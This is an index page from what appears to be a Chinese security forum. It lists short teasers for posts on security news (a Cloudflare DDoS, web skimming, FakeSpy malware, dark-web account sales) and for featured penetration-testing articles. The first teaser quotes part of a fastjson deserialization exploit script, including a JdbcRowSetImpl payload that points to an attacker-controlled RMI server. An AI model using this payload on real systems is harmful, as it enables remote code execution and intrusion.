fastjson一键利用工具

根据网上大神jar工具写了个一键利用脚本child = subprocess.Popen( , stdout=subprocess.PIPE,stderr=subprocess.PIPE)开个线程运行java起HTTP及RMI服务。def send_payload(): data = \'{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://\'+server_ip+\':28888/Object","autoCommit":true}}\' fastjson_payload = requests.post(url=url,headers=headers,data=data) if fastjson_payload.status_code ...

Cloudflare其在6月下旬遭到大规模DDoS攻击

6月21日,Cloudflare自动缓解了高容量的DDoS攻击,该攻击的峰值为每秒7.54亿个数据包。这次攻击是从6月18日到6月21日结束的为期四天的有组织运动的一部分:攻击流量是从超过316,000个IP地址发送到单个Cloudflare IP地址的,该地址主要用于我们免费计划中的网站。攻击期间未报告停机或服务降级,并且由于我们未计量的缓解保 ...

2020-07-11 15:42:41 2 100

黑客组织 Keeper 追踪:三年间入侵 570 家电商网站 牟利 700 多万元

黑客组织“Keeper”表示对在过去三年间,全球超过 570 个在线电子商务网站的数据泄漏事件负责。该黑客阻止惯用伎俩是入侵商城的后台,修改源代码、嵌入恶意脚本、记录购物者在付款时的支付卡细节等等。这类网络攻击也被称之为“web skimming/e-skimming”(网页掠夺)。在威胁情报公司 Gemini Advisory 发布的一份报告中,K ...

2020-07-11 15:07:28 0 87

研究发现平均为70.91美元就能在暗网买到银行账户

据Digital Shadows网络安全研究人员称,包括银行账户和网络管理员账户在内的逾150亿条各类账户信息在暗网上“待价而沽”,其中有些信息甚至可供免费访问。许多账户被多次分享,表明用户不知道自己的账户已遭到攻击。即使信息存在重复,在暗网上“待价而沽”的“独立”账户超过50亿个。Digital Shadows表示,售价最高的是机 ...

2020-07-10 10:36:46 0 175

服刑10年出狱后,天才黑客眼中的世界变成这样了

编者按:Jesse William McGraw是名为 Electronik Tribulation Army(ETA)的无政府主义黑客组织负责人,在 2011 年因入侵医院系统以及工控 SCADA 系统而被判入狱 110 个月。服刑期间,他因为使用狱友的账号登陆计算机而被抓住遭到彻底的技术隔离。出狱之后他目睹了技术在过去十年发生的翻天覆地的变化,以及重大的科技事件 ...

2020-07-09 15:56:41 10 560

成都电子科技大学被印度留学生黑了

都电子科技大学被印度留学生搞了,教学楼显示屏出现“拒绝中国制造”口号?自从前段时间中印边境冲突之后,印度反华的情绪就一直居高不下,从最开始抵制中国制造,砸电视、砸手机,到后来下架国内59款APP参考:突发!以“国家安全”为名,印度政府宣布封杀59款中国APP (附名单)钉子刷微博的时候刷到一个ID上帝之鹰发的成都 ...

2020-07-09 13:33:17 35 2956

名为FakeSpy的Android恶意软件三年后“重现江湖” 比以前更危险

该应用能够窃取用户的短信、银行信息和应用数据。该恶意软件通过一条看似来自当地邮局的短信进行传播,并指示用户下载一款伪装成合法邮局应用的应用。据Cybereason的一份新报告显示,一款名为FakeSpy的危险Android恶意软件已重新出现。FakeSpy是近三年前被安全研究人员首次发现的,是一款特别恶劣的恶意软件,旨在窃取用户 ...

2020-07-07 00:27:18 0 233

热门活动

T00ls专家

zcgonvh

荣誉会员

文章26篇,精华12篇

1

Twi1ight

荣誉会员

文章35篇,精华11篇

2

Bypass

荣誉会员

文章26篇,精华5篇

3

lyxhh

注册会员

文章12篇,精华4篇

4

backlion

注册会员

文章29篇,精华3篇

5

thesoul

荣誉会员

文章30篇,精华2篇

6

宝宝

注册会员

文章53篇,精华2篇

7

Shrimp

荣誉会员

文章54篇,精华2篇

8

lostwolf

荣誉会员

文章144篇,精华2篇

9

anhkgg

注册会员

文章30篇,精华2篇

10

最新精华

渗透测试Windows内网协议-Kerberos

## Kerberos协议### 简介Kerberos是一种由MIT(麻省理工大学)提 ...

2020-04-15 21:59:32 11 672

渗透测试这是一篇“不一样”的真实渗透测试案例分析文章

# 0x00 前言本文是由一次真实的授权渗透案例引申而出的技术分析 ...

2020-03-20 18:16:34 66 10148

渗透测试Windows认证原理解析基础入门学习

#### 0x01 前言简介本文借鉴安全界各位大佬所写的Windows认证入 ...

2020-03-17 13:07:21 16 527

渗透测试CVE-2020-0688的武器化与.net反序列化漏洞那些事

# CVE-2020-0688的武器化与.net反序列化漏洞那些事## 0x00 前言T ...

2020-03-01 21:07:59 47 8574

逆向破解利用python免杀cs shellcode

# 利用python免杀cs shellcode## 0x01 前言​老方法,拓展了一下 ...

2020-02-13 11:30:06 48 2110

【工具】Linux 无线热点 Adhoc

Adhoc为Linux下的命令工具,让你PC上的无线设备成为无线热点(Access Point),就像无线路由器一样,其他网络设备可以通过该AP访问Internet资源(前提是你的PC已经连入网络).该工具将指定的无线设备接口创建为热点,并能够设置无线网络名称ESSID,以及连入网络所需的密码等.该工具小巧,方便,适合不喜欢通过UI配置电脑的Geek们 :-)github托管地址:[url=https://github.com/flytreeleft/adhoc]http ...

火绒安全(huorong.cn) SQL注入漏洞

根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询admin@t00ls.net!

Top ↑